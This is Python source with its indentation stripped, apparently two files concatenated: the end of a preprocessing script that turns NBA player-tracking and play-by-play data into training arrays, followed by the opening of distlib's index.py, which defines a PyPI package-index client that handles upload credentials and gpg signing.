archive = py7zr.SevenZipFile(f"{TRACKING_DIR}/{game_7z}", mode="r")
archive.extractall(path=f"{TRACKING_DIR}/{game_name}")
archive.close()
except AttributeError:
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
gameids.append("N/A")
continue
try:
gameids.append(os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0])
except IndexError:
gameids.append("N/A")
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
queue.put((game_names, gameids))
def get_game_name2gameid_map():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=game_name2gameid_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
all_game_names = []
all_gameids = []
for _ in jobs:
(game_names, gameids) = q.get()
all_game_names.extend(game_names)
all_gameids.extend(gameids)
for p in jobs:
p.join()
df = pd.DataFrame.from_dict({"game_name": all_game_names, "gameid": all_gameids})
home_dir = os.path.expanduser("~")
df.to_csv(f"{home_dir}/test.csv", index=False)
def playerid2player_idx_map_worker(game_7zs, queue):
playerid2props = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
archive = py7zr.SevenZipFile(f"{TRACKING_DIR}/{game_7z}", mode="r")
archive.extractall(path=f"{TRACKING_DIR}/{game_name}")
archive.close()
except AttributeError:
print(f"{game_name}\nBusted.", flush=True)
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
continue
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except IndexError:
print(f"No tracking data for {game_name}.", flush=True)
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
continue
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
event = df_tracking["events"].iloc[0]
players = event["home"]["players"] + event["visitor"]["players"]
for player in players:
playerid = player["playerid"]
playerid2props[playerid] = {
"name": " ".join([player["firstname"], player["lastname"]]),
}
queue.put(playerid2props)
def get_playerid2player_idx_map():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(
target=playerid2player_idx_map_worker, args=(game_7zs, q)
)
jobs.append(p)
p.start()
playerid2props = {}
for _ in jobs:
playerid2props.update(q.get())
for p in jobs:
p.join()
playerid2player_idx = {}
player_idx2props = {}
for (player_idx, playerid) in enumerate(playerid2props):
playerid2player_idx[playerid] = player_idx
player_idx2props[player_idx] = playerid2props[playerid]
player_idx2props[player_idx]["playerid"] = playerid
return (playerid2player_idx, player_idx2props)
def get_game_time(game_clock_secs, period):
period_secs = 720 if period <= 4 else 300
period_time = period_secs - game_clock_secs
if period <= 4:
return (period - 1) * 720 + period_time
else:
return 4 * 720 + (period - 5) * 300 + period_time
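# Worked example: get_game_time(600, 2) -> (2 - 1) * 720 + (720 - 600) = 840,
# i.e. 840 seconds of game time have elapsed when the second-quarter clock
# shows 10:00 remaining. Overtime periods (period >= 5) are 300 seconds long.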
def get_shot_times_worker(game_7zs, queue):
shot_times = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except FileNotFoundError:
continue
df_events = pd.read_csv(f"{EVENTS_DIR}/{gameid}.csv")
game_shot_times = {}
for (row_idx, row) in df_events.iterrows():
period = row["PERIOD"]
game_clock = row["PCTIMESTRING"].split(":")
game_clock_secs = 60 * int(game_clock[0]) + int(game_clock[1])
game_time = get_game_time(game_clock_secs, period)
if (row["EVENTMSGTYPE"] == 1) or (row["EVENTMSGTYPE"] == 2):
game_shot_times[game_time] = row["PLAYER1_TEAM_ABBREVIATION"]
shot_times[gameid] = game_shot_times
queue.put(shot_times)
def get_shot_times():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=get_shot_times_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
shot_times = {}
for _ in jobs:
shot_times.update(q.get())
for p in jobs:
p.join()
return shot_times
def fill_in_periods(game_hoop_sides):
for p1 in range(4):
if p1 not in game_hoop_sides:
continue
adder = 1 if p1 <= 2 else 3
p2 = (p1 % 2) + adder
if p2 not in game_hoop_sides:
game_hoop_sides[p2] = game_hoop_sides[p1].copy()
period_hoop_sides = list(game_hoop_sides[p1].items())
swapped = {
period_hoop_sides[0][0]: period_hoop_sides[1][1],
period_hoop_sides[1][0]: period_hoop_sides[0][1],
}
p2s = [3, 4] if p1 <= 2 else [1, 2]
for p2 in p2s:
if p2 not in game_hoop_sides:
game_hoop_sides[p2] = swapped.copy()
return game_hoop_sides
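# fill_in_periods mirrors whatever hoop sides were observed: a period's sides
# are copied to the other period of the same half (1 <-> 2, 3 <-> 4) and
# swapped for the periods of the other half, since teams switch ends at
# halftime. Note that the loop runs over range(4), so period 4 is never used
# as a source period and overtime periods are not filled in by this helper.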
def check_periods(game_hoop_sides, team, game):
for period in range(4):
if period in {2, 4}:
if period - 1 in game_hoop_sides:
assert (
game_hoop_sides[period - 1][team] == game_hoop_sides[period][team]
), f"{team} has different sides in periods {period} and {period - 1} of {game}."
if period in {3, 4}:
for first_half in [1, 2]:
if first_half in game_hoop_sides:
assert (
game_hoop_sides[first_half][team]
!= game_hoop_sides[period][team]
), f"{team} has same side in periods {first_half} and {period} of {game}."
def get_game_hoop_sides(teams, hoop_side_counts, game):
[team_a, team_b] = list(teams)
game_hoop_sides = {period: {} for period in hoop_side_counts}
do_check = False
periods = list(hoop_side_counts)
periods.sort()
for period in periods:
if len(hoop_side_counts[period]) == 0:
print(f"No shooting data for {period} of {game}.")
continue
for team in teams:
if team not in hoop_side_counts[period]:
print(f"Missing {team} for {period} of {game}.")
hoop_side_counts[period][team] = {0: 0, COURT_LENGTH: 0}
l_count = hoop_side_counts[period][team][0]
r_count = hoop_side_counts[period][team][COURT_LENGTH]
if l_count > r_count:
game_hoop_sides[period][team] = 0
elif l_count < r_count:
game_hoop_sides[period][team] = COURT_LENGTH
else:
do_check = True
if do_check:
team_in = team_a if team_a in game_hoop_sides[period] else team_b
team_out = team_a if team_a not in game_hoop_sides[period] else team_b
hoop_side = game_hoop_sides[period][team_in]
if hoop_side == 0:
game_hoop_sides[period][team_out] = 0
else:
game_hoop_sides[period][team_out] = COURT_LENGTH
do_check = False
assert (
game_hoop_sides[period][team_a] != game_hoop_sides[period][team_b]
), f"{team_a} and {team_b} have same side in {period} of {game}."
game_hoop_sides = fill_in_periods(game_hoop_sides)
for team in teams:
check_periods(game_hoop_sides, team, game)
return game_hoop_sides
def get_hoop_sides_worker(game_7zs, queue):
hoop_sides = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except FileNotFoundError:
continue
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
hoop_side_counts = {}
used_game_times = set()
teams = set()
for tracking_event in df_tracking["events"]:
for moment in tracking_event["moments"]:
period = moment[0]
game_clock = moment[2]
game_time = int(get_game_time(game_clock, period))
if (game_time in shot_times[gameid]) and (
game_time not in used_game_times
):
ball_x = moment[5][0][2]
if ball_x < HALF_COURT_LENGTH:
hoop_side = 0
else:
hoop_side = COURT_LENGTH
if period not in hoop_side_counts:
hoop_side_counts[period] = {}
shooting_team = shot_times[gameid][game_time]
if shooting_team not in hoop_side_counts[period]:
hoop_side_counts[period][shooting_team] = {
0: 0,
COURT_LENGTH: 0,
}
hoop_side_counts[period][shooting_team][hoop_side] += 1
used_game_times.add(game_time)
teams.add(shooting_team)
if len(teams) == 0:
print(f"The moments in the {game_name} JSON are empty.", flush=True)
continue
hoop_sides[gameid] = get_game_hoop_sides(teams, hoop_side_counts, game_name)
queue.put(hoop_sides)
def get_team_hoop_sides():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=get_hoop_sides_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
hoop_sides = {}
for _ in jobs:
hoop_sides.update(q.get())
for p in jobs:
p.join()
return hoop_sides
def get_event_stream(gameid):
df_events = pd.read_csv(f"{EVENTS_DIR}/{gameid}.csv")
df_events = df_events.fillna("")
df_events["DESCRIPTION"] = (
df_events["HOMEDESCRIPTION"]
+ " "
+ df_events["NEUTRALDESCRIPTION"]
+ " "
+ df_events["VISITORDESCRIPTION"]
)
# Possession times.
# EVENTMSGTYPE descriptions can be found at: https://github.com/rd11490/NBA_Tutorials/tree/master/analyze_play_by_play.
event_col = "EVENTMSGTYPE"
description_col = "DESCRIPTION"
player1_team_col = "PLAYER1_TEAM_ABBREVIATION"
teams = list(df_events[player1_team_col].unique())
teams.sort()
teams = teams[1:] if len(teams) > 2 else teams
event = None
score = "0 - 0"
# pos_team is the team that had possession prior to the event.
(pos_team, pos_team_idx) = (None, None)
jump_ball_team_idx = None
# I think most of these are technical fouls.
skip_fouls = {10, 11, 16, 19}
events = set()
pos_stream = []
event_stream = []
for (row_idx, row) in df_events.iterrows():
period = row["PERIOD"]
game_clock = row["PCTIMESTRING"].split(":")
game_clock_secs = 60 * int(game_clock[0]) + int(game_clock[1])
game_time = get_game_time(game_clock_secs, period)
description = row[description_col].lower().strip()
eventmsgtype = row[event_col]
# Don't know.
if eventmsgtype == 18:
continue
# Blank line.
elif eventmsgtype == 14:
continue
# End of a period.
elif eventmsgtype == 13:
if period == 4:
jump_ball_team_idx = None
continue
# Start of a period.
elif eventmsgtype == 12:
if 2 <= period <= 4:
if period == 4:
pos_team_idx = jump_ball_team_idx
else:
pos_team_idx = (jump_ball_team_idx + 1) % 2
elif 6 <= period:
pos_team_idx = (jump_ball_team_idx + (period - 5)) % 2
continue
# Ejection.
elif eventmsgtype == 11:
continue
# Jump ball.
elif eventmsgtype == 10:
if int(row["PLAYER3_ID"]) in TEAM_ID2PROPS:
pos_team = TEAM_ID2PROPS[int(row["PLAYER3_ID"])]["abbreviation"]
else:
pos_team = row["PLAYER3_TEAM_ABBREVIATION"]
if pos_team == teams[0]:
pos_team_idx = 0
else:
pos_team_idx = 1
if (period in {1, 5}) and (jump_ball_team_idx is None):
jump_ball_team_idx = pos_team_idx
continue
# Timeout.
elif eventmsgtype == 9:
# TV timeout?
if description == "":
continue
event = "timeout"
# Substitution.
elif eventmsgtype == 8:
continue
# Violation.
elif eventmsgtype == 7:
# With 35 seconds left in the fourth period, there was a kicked ball
# violation attributed to Wayne Ellington of the Brooklyn Nets, but the
# following event is a shot by the Nets, which means possession never changed.
if (gameid == "0021500414") and (row_idx == 427):
continue
# Goaltending is considered a made shot, so the following event is always the
# made shot event.
if "goaltending" in description:
score = row["SCORE"] if row["SCORE"] else score
continue
# Jump ball violations have weird possession rules.
elif "jump ball" in description:
if row["PLAYER1_TEAM_ABBREVIATION"] == teams[0]:
pos_team_idx = 1
else:
pos_team_idx = 0
pos_team = teams[pos_team_idx]
if (period == 1) and (game_time == 0):
jump_ball_team_idx = pos_team_idx
continue
else:
if row[player1_team_col] == teams[pos_team_idx]:
event = "violation_offense"
pos_team_idx = (pos_team_idx + 1) % 2
else:
event = "violation_defense"
# Foul.
elif eventmsgtype == 6:
# Skip weird fouls.
if row["EVENTMSGACTIONTYPE"] in skip_fouls:
score = row["SCORE"] if row["SCORE"] else score
continue
else:
if row[player1_team_col] == teams[pos_team_idx]:
event = "offensive_foul"
pos_team_idx = (pos_team_idx + 1) % 2
else:
event = "defensive_foul"
# Turnover.
elif eventmsgtype == 5:
if "steal" in description:
event = "steal"
elif "goaltending" in description:
event = "goaltending_offense"
elif (
("violation" in description)
or ("dribble" in description)
or ("traveling" in description)
):
event = "violation_offense"
else:
event = "turnover"
# Team turnover.
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
team_abb = TEAM_ID2PROPS[team_id]["abbreviation"]
else:
team_abb = row[player1_team_col]
pos_team_idx = 1 if team_abb == teams[0] else 0
# Rebound.
elif eventmsgtype == 4:
# With 17 seconds left in the first period, Spencer Hawes missed a tip in,
# which was rebounded by DeAndre Jordan. The tip in is recorded as a rebound
# and a missed shot for Hawes. All three events have the same timestamp,
# which seems to have caused the order of the events to be slightly shuffled
# with the Jordan rebound occurring before the tip in.
if (gameid == "0021500550") and (row_idx == 97):
continue
# Team rebound.
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
team_abb = TEAM_ID2PROPS[team_id]["abbreviation"]
if team_abb == teams[pos_team_idx]:
event = "rebound_offense"
else:
event = "rebound_defense"
pos_team_idx = (pos_team_idx + 1) % 2
elif row[player1_team_col] == teams[pos_team_idx]:
event = "rebound_offense"
else:
event = "rebound_defense"
pos_team_idx = (pos_team_idx + 1) % 2
# Free throw.
elif eventmsgtype == 3:
# See rules for technical fouls: https://official.nba.com/rule-no-12-fouls-and-penalties/.
# Possession only changes for too many players, which is extremely rare.
if "technical" not in description:
pos_team_idx = 0 if row[player1_team_col] == teams[0] else 1
if (
("Clear Path" not in row[description_col])
and ("Flagrant" not in row[description_col])
and ("MISS" not in row[description_col])
and (
("1 of 1" in description)
or ("2 of 2" in description)
or ("3 of 3" in description)
)
):
# Hack to handle foul shots for away from play fouls.
if ((gameid == "0021500274") and (row_idx == 519)) or (
(gameid == "0021500572") and (row_idx == 428)
):
pass
# This event is a made foul shot by Thaddeus Young of the Brooklyn
# Nets following an and-one foul, so possession should have changed
# to the Milwaukee Bucks. However, the next event is a made shot by
# Brook Lopez (also of the Brooklyn Nets) with no event indicating a
# change of possession occurring before it.
elif (gameid == "0021500047") and (row_idx == 64):
pass
else:
pos_team_idx = (pos_team_idx + 1) % 2
pos_team = teams[pos_team_idx]
score = row["SCORE"] if row["SCORE"] else score
continue
# Missed shot.
elif eventmsgtype == 2:
if "dunk" in description:
shot_type = "dunk"
elif "layup" in description:
shot_type = "layup"
else:
shot_type = "shot"
if "BLOCK" in row[description_col]:
miss_type = "block"
else:
miss_type = "miss"
event = f"{shot_type}_{miss_type}"
if row[player1_team_col] != teams[pos_team_idx]:
print(pos_stream[-5:])
raise ValueError(f"Incorrect possession team in row {str(row_idx)}.")
# Made shot.
elif eventmsgtype == 1:
if "dunk" in description:
shot_type = "dunk"
elif "layup" in description:
shot_type = "layup"
else:
shot_type = "shot"
event = f"{shot_type}_made"
if row[player1_team_col] != teams[pos_team_idx]:
print(pos_stream[-5:])
raise ValueError(f"Incorrect possession team in row {str(row_idx)}.")
pos_team_idx = (pos_team_idx + 1) % 2
events.add(event)
pos_stream.append(pos_team_idx)
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
event_team = TEAM_ID2PROPS[team_id]["abbreviation"]
else:
event_team = row[player1_team_col]
event_stream.append(
{
"game_time": game_time - 1,
"pos_team": pos_team,
"event": event,
"description": description,
"event_team": event_team,
"score": score,
}
)
# With 17 seconds left in the first period, Spencer Hawes missed a tip in,
# which was rebounded by DeAndre Jordan. The tip in is recorded as a rebound
# and a missed shot for Hawes. All three events have the same timestamp,
# which seems to have caused the order of the events to be slightly shuffled
# with the Jordan rebound occurring before the tip in.
if (gameid == "0021500550") and (row_idx == 98):
event_stream.append(
{
"game_time": game_time - 1,
"pos_team": pos_team,
"event": "rebound_defense",
"description": "jordan rebound (off:2 def:5)",
"event_team": "LAC",
"score": score,
}
)
pos_team_idx = (pos_team_idx + 1) % 2
# This event is a missed shot by Kawhi Leonard of the San Antonio Spurs. The next
# event is a missed shot by Bradley Beal of the Washington Wizards with no
# event indicating a change of possession occurring before it.
if (gameid == "0021500061") and (row_idx == 240):
pos_team_idx = (pos_team_idx + 1) % 2
pos_team = teams[pos_team_idx]
score = row["SCORE"] if row["SCORE"] else score
return event_stream
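# Each entry appended to event_stream above is a dict with the keys game_time,
# pos_team, event, description, event_team and score, where pos_team is the
# team in possession before the event and event is a coarse label such as
# 'shot_made', 'layup_miss', 'rebound_defense' or 'turnover'.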
def get_event_streams_worker(game_names, queue):
gameid2event_stream = {}
for (game_idx, game_name) in enumerate(game_names):
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
gameid2event_stream[gameid] = get_event_stream(gameid)
except IndexError:
continue
queue.put(gameid2event_stream)
def get_event_streams():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_names = [dir_f for dir_f in dir_fs if not dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_names_per_process = int(np.ceil(len(all_game_names) / processes))
jobs = []
for i in range(processes):
start = i * game_names_per_process
end = start + game_names_per_process
game_names = all_game_names[start:end]
p = multiprocessing.Process(
target=get_event_streams_worker, args=(game_names, q)
)
jobs.append(p)
p.start()
gameid2event_stream = {}
for _ in jobs:
gameid2event_stream.update(q.get())
for p in jobs:
p.join()
event2event_idx = {}
for event_stream in gameid2event_stream.values():
for event in event_stream:
event2event_idx.setdefault(event["event"], len(event2event_idx))
return (event2event_idx, gameid2event_stream)
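# event2event_idx maps each distinct event label to a contiguous integer index
# assigned in order of first appearance (via setdefault), so the mapping
# depends on the order in which games and events happen to be processed.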
def add_score_changes(X):
score_diff_idx = 6
period_idx = 3
wall_clock_idx = -1
score_change_idxs = np.where(np.diff(X[:, score_diff_idx]) != 0)[0] + 1
score_changes = (
X[score_change_idxs, score_diff_idx] - X[score_change_idxs - 1, score_diff_idx]
)
# Score changes at the half are the result of the teams changing sides.
half_idx = -1
if (X[:, period_idx].min() <= 2) and (X[:, period_idx].max() >= 3):
period_change_idxs = np.where(np.diff(X[:, 3]) != 0)[0] + 1
for period_change_idx in period_change_idxs:
before_period = X[period_change_idx - 1, period_idx]
after_period = X[period_change_idx, period_idx]
if (before_period <= 2) and (after_period > 2):
half_idx = period_change_idx
break
else:
half_idx = -1
cur_score_change_idx = 0
times_to_next_score_change = []
next_score_changes = []
end_time = X[-1, wall_clock_idx]
for (idx, row) in enumerate(X):
try:
if idx == score_change_idxs[cur_score_change_idx]:
cur_score_change_idx += 1
score_change_idx = score_change_idxs[cur_score_change_idx]
next_score_time = X[score_change_idx, wall_clock_idx]
if score_change_idx == half_idx:
next_score_change = 0
else:
next_score_change = score_changes[cur_score_change_idx]
except IndexError:
next_score_time = end_time
next_score_change = 0
cur_time = X[idx, wall_clock_idx]
time_to_next_score_change = (next_score_time - cur_time) / 1000
times_to_next_score_change.append(time_to_next_score_change)
next_score_changes.append(next_score_change)
times_to_next_score_change = np.array(times_to_next_score_change)[None].T
next_score_changes = np.array(next_score_changes)[None].T
X = np.hstack(
[
X[:, :wall_clock_idx],
times_to_next_score_change,
next_score_changes,
X[:, wall_clock_idx:],
]
)
return X
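# add_score_changes inserts two columns immediately before the wall-clock
# column: the number of seconds until the score next changes and the size of
# that change (0 when no further scoring occurs, and 0 across the halftime
# side swap, which otherwise looks like a jump in the score differential).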
def save_game_numpy_arrays(game_name):
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except IndexError:
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
return
if gameid not in gameid2event_stream:
print(f"Missing gameid: {gameid}", flush=True)
return
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
home_team = None
cur_time = -1
event_idx = 0
game_over = False
X = []
y = []
event_stream = gameid2event_stream[gameid]
for tracking_event in df_tracking["events"]:
event_id = tracking_event["eventId"]
if home_team is None:
home_team_id = tracking_event["home"]["teamid"]
home_team = TEAM_ID2PROPS[home_team_id]["abbreviation"]
moments = tracking_event["moments"]
for moment in moments:
period = moment[0]
# Milliseconds.
wall_clock = moment[1]
game_clock = moment[2]
shot_clock = moment[3]
shot_clock = shot_clock if shot_clock else game_clock
period_time = 720 - game_clock if period <= 4 else 300 - game_clock
game_time = get_game_time(game_clock, period)
# Moments can overlap temporally, so previously processed time points are
# skipped along with clock stoppages.
if game_time <= cur_time:
continue
while game_time > event_stream[event_idx]["game_time"]:
event_idx += 1
if event_idx >= len(event_stream):
game_over = True
break
if game_over:
break
event = event_stream[event_idx]
score = event["score"]
(away_score, home_score) = (int(s) for s in score.split(" - "))
home_hoop_side = hoop_sides[gameid][period][home_team]
if home_hoop_side == 0:
(left_score, right_score) = (home_score, away_score)
else:
(right_score, left_score) = (home_score, away_score)
(ball_x, ball_y, ball_z) = moment[5][0][2:5]
data = [
game_time,
period_time,
shot_clock,
period,
left_score, # off_score,
right_score, # def_score,
left_score - right_score,
ball_x,
ball_y,
ball_z,
]
if len(moment[5][1:]) != 10:
continue
player_idxs = []
player_xs = []
player_ys = []
player_hoop_sides = []
try:
for player in moment[5][1:]:
player_idxs.append(playerid2player_idx[player[1]])
player_xs.append(player[2])
player_ys.append(player[3])
hoop_side = hoop_sides[gameid][period][
TEAM_ID2PROPS[player[0]]["abbreviation"]
]
player_hoop_sides.append(int(hoop_side == COURT_LENGTH))
except KeyError:
if player[1] == 0:
print(
f"Bad player in event {event_id} for {game_name}.", flush=True
)
continue
else:
raise KeyError
order = np.argsort(player_idxs)
for idx in order:
data.append(player_idxs[idx])
for idx in order:
data.append(player_xs[idx])
for idx in order:
data.append(player_ys[idx])
for idx in order:
data.append(player_hoop_sides[idx])
data.append(event_idx)
data.append(wall_clock)
if len(data) != 52:
raise ValueError
X.append(np.array(data))
y.append(event2event_idx.setdefault(event["event"], len(event2event_idx)))
cur_time = game_time
if game_over:
break
X = np.stack(X)
y = np.array(y)
X = add_score_changes(X)
np.save(f"{GAMES_DIR}/{gameid}_X.npy", X)
np.save(f"{GAMES_DIR}/{gameid}_y.npy", y)
def save_numpy_arrays_worker(game_names):
for game_name in game_names:
try:
save_game_numpy_arrays(game_name)
except ValueError:
pass
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
def save_numpy_arrays():
dir_fs = os.listdir(TRACKING_DIR)
all_game_names = [dir_f for dir_f in dir_fs if not dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_names_per_process = int(np.ceil(len(all_game_names) / processes))
jobs = []
for i in range(processes):
start = i * game_names_per_process
end = start + game_names_per_process
game_names = all_game_names[start:end]
p = multiprocessing.Process(target=save_numpy_arrays_worker, args=(game_names,))
jobs.append(p)
p.start()
for p in jobs:
p.join()
def player_idx2playing_time_map_worker(gameids, queue):
player_idx2playing_time = {}
for gameid in gameids:
X = np.load(f"{GAMES_DIR}/{gameid}_X.npy")
wall_clock_diffs = np.diff(X[:, -1]) / 1000
all_player_idxs = X[:, 10:20].astype(int)
prev_players = set(all_player_idxs[0])
for (row_idx, player_idxs) in enumerate(all_player_idxs[1:]):
current_players = set(player_idxs)
if len(prev_players & current_players) == 10:
wall_clock_diff = wall_clock_diffs[row_idx]
if wall_clock_diff < THRESHOLD:
for player_idx in current_players:
player_idx2playing_time[player_idx] = (
player_idx2playing_time.get(player_idx, 0) + wall_clock_diff
)
prev_players = current_players
queue.put(player_idx2playing_time)
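# Playing time is only accumulated for rows where the same ten players are on
# the floor as in the previous row and the wall-clock gap is below THRESHOLD
# (1.0 second), so substitutions and clock stoppages do not inflate the totals.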
def get_player_idx2playing_time_map():
q = multiprocessing.Queue()
all_gameids = list(set([np_f.split("_")[0] for np_f in os.listdir(GAMES_DIR)]))
processes = multiprocessing.cpu_count()
gameids_per_process = int(np.ceil(len(all_gameids) / processes))
jobs = []
for i in range(processes):
start = i * gameids_per_process
end = start + gameids_per_process
gameids = all_gameids[start:end]
p = multiprocessing.Process(
target=player_idx2playing_time_map_worker, args=(gameids, q)
)
jobs.append(p)
p.start()
player_idx2playing_time = {}
for _ in jobs:
game_player_idx2_playing_time = q.get()
for (player_idx, playing_time) in game_player_idx2_playing_time.items():
player_idx2playing_time[player_idx] = (
player_idx2playing_time.get(player_idx, 0) + playing_time
)
for p in jobs:
p.join()
playing_times = list(player_idx2playing_time.values())
print(np.quantile(playing_times, [0.1, 0.2, 0.25, 0.5, 0.75, 0.8, 0.9]))
# [ 3364.6814 10270.2988 13314.768 39917.09399999
# 59131.73249999 63400.76839999 72048.72879999]
return player_idx2playing_time
if __name__ == "__main__":
os.makedirs(GAMES_DIR, exist_ok=True)
(playerid2player_idx, player_idx2props) = get_playerid2player_idx_map()
try:
baller2vec_config = pickle.load(
open(f"{DATA_DIR}/baller2vec_config.pydict", "rb")
)
player_idx2props = baller2vec_config["player_idx2props"]
event2event_idx = baller2vec_config["event2event_idx"]
playerid2player_idx = {}
for (player_idx, props) in player_idx2props.items():
playerid2player_idx[props["playerid"]] = player_idx
except FileNotFoundError:
baller2vec_config = False
shot_times = get_shot_times()
hoop_sides = get_team_hoop_sides()
(event2event_idx, gameid2event_stream) = get_event_streams()
if baller2vec_config:
event2event_idx = baller2vec_config["event2event_idx"]
save_numpy_arrays()
player_idx2playing_time = get_player_idx2playing_time_map()
for (player_idx, playing_time) in player_idx2playing_time.items():
player_idx2props[player_idx]["playing_time"] = playing_time
if not baller2vec_config:
baller2vec_config = {
"player_idx2props": player_idx2props,
"event2event_idx": event2event_idx,
}
pickle.dump(
baller2vec_config, open(f"{DATA_DIR}/baller2vec_config.pydict", "wb")
)
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically be a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
